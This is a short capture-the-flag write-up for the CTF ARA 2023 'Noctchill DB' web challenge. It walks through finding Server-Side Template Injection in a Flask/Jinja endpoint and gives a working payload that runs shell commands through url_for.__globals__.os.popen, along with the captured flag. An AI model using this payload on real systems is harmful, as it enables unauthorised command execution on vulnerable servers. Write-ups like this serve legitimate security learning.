ctf-writeup/2023/CTF ARA 2023/Noctchill DB/README.md

1.1 KiB

Noctchill DB

Checkout my Noctchill Database Page.

About the Challenge

Given a website along with its source code (You can get the source code here), when we open the website we will be met with shiny color members :D.

preview

And then when I checking the code, apparently there is no filter in the idol detail endpoint section which can result in Server-Side Template Injection (SSTI)

code

template

How to Solve?

First I test the website using the payload as below

http://103.152.242.116:6712/{{7*7}}

And it turns out that the output is 49 which means vulnerable to SSTI

test

After testing a lot of payloads and reading other CTF event writeups, I found the final payload to perform RCE on the server

http://103.152.242.116:6712/{{url_for.__globals__.os.__dict__.popen(request.args.file).read()}}?file=ls /

rce

Open the flag_68b329da98.txt file to get the flag

ARA2023{its_n0t_th4t_h4rd_r1ghT??}